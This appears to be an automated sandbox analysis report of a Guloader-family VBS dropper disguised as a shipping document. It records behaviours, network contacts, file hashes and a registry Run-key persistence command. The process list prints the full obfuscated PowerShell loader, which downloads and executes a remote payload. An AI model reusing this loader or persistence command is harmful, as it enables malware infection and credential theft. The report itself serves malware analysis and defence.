Analysis Overview
SHA256
5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66
Threat Level: Known bad
The file 21052024_1445_Shipping Document.vbs was found to be: Known bad.
Malicious Activity Summary
Guloader, Cloudeye
NirSoft WebBrowserPassView
NirSoft MailPassView
Nirsoft
Blocklisted process makes network request
Checks computer location settings
Adds Run key to start application
Accesses Microsoft Outlook accounts
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Modifies registry key
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-21 14:45
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-21 14:45
Reported
2024-05-21 14:48
Platform
win7-20240508-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\Antodontalgic = "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\\Sojaskraaets\\').Afdryp;%Peritenon% ($Intermorainic)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2672 set thread context of 1320 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21052024_1445_Shipping Document.vbs"
C:\Windows\System32\cmd.exe
cmd.exe /c ping 6777.6777.6777.677e
C:\Windows\system32\PING.EXE
ping 6777.6777.6777.677e
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 6777.6777.6777.677e | udp |
| US | 8.8.8.8:53 | madibarohilalatwo.duckdns.org | udp |
| DE | 84.247.187.12:80 | madibarohilalatwo.duckdns.org | tcp |
| US | 8.8.8.8:53 | cadenaderegalos.com | udp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
Files
memory/2128-4-0x000007FEF614E000-0x000007FEF614F000-memory.dmp
memory/2128-5-0x000000001B6B0000-0x000000001B992000-memory.dmp
memory/2128-6-0x0000000002790000-0x0000000002798000-memory.dmp
memory/2128-7-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp
memory/2128-8-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp
memory/2128-9-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XWS8BUWVGIW67HF3TBJR.temp
| MD5 | 66d985eb027b5bd8ea22c6fdc91246b9 |
| SHA1 | a7bf7fe0725a3fe299f3d4efb1699ea288bde3a2 |
| SHA256 | ccee5f4135c12fd0afdf18341162d3f475196c3e09752d12a0b82a3524b37c65 |
| SHA512 | 68c62a7a48e7be300540911e838104afd02af4dc6e437394f9cbdb1208c6a750d4512d0b764ff71a3ecadd3231ff760f3fdb851c2b3d933497857c571eae8682 |
C:\Users\Admin\AppData\Roaming\Droh.Lit
| MD5 | 1a958060ba3e3de4653959fe2fd1efd5 |
| SHA1 | c5d3a5646dc5920668f1f61c334c7c7d40c888b5 |
| SHA256 | 268dacbaea80bdf0e4ffcbcf21ce4558988d4c77f2906d571a5a1b9db9dc17ab |
| SHA512 | 8ba4e481b0a08940a5423abc5d1e7ffa01e4aa185536af215a43e5d28ee025f5caf5355514b2a13f0565c42796e1bd864104878d79d086a82648b0733929c5d0 |
memory/2672-15-0x0000000006670000-0x0000000008F39000-memory.dmp
memory/2128-16-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp
memory/2128-17-0x000007FEF614E000-0x000007FEF614F000-memory.dmp
memory/1320-19-0x0000000001000000-0x0000000002062000-memory.dmp
memory/2128-26-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-21 14:45
Reported
2024-05-21 14:48
Platform
win10v2004-20240508-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Guloader,Cloudeye
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Antodontalgic = "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\\Sojaskraaets\\').Afdryp;%Peritenon% ($Intermorainic)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4900 set thread context of 2160 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
| PID 2160 set thread context of 4924 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Program Files (x86)\windows mail\wab.exe |
| PID 2160 set thread context of 2256 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Program Files (x86)\windows mail\wab.exe |
| PID 2160 set thread context of 1204 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21052024_1445_Shipping Document.vbs"
C:\Windows\System32\cmd.exe
cmd.exe /c ping 6777.6777.6777.677e
C:\Windows\system32\PING.EXE
ping 6777.6777.6777.677e
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. 
Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. 
';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. 
SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP 
FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. 
Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. 
Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. 
';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. 
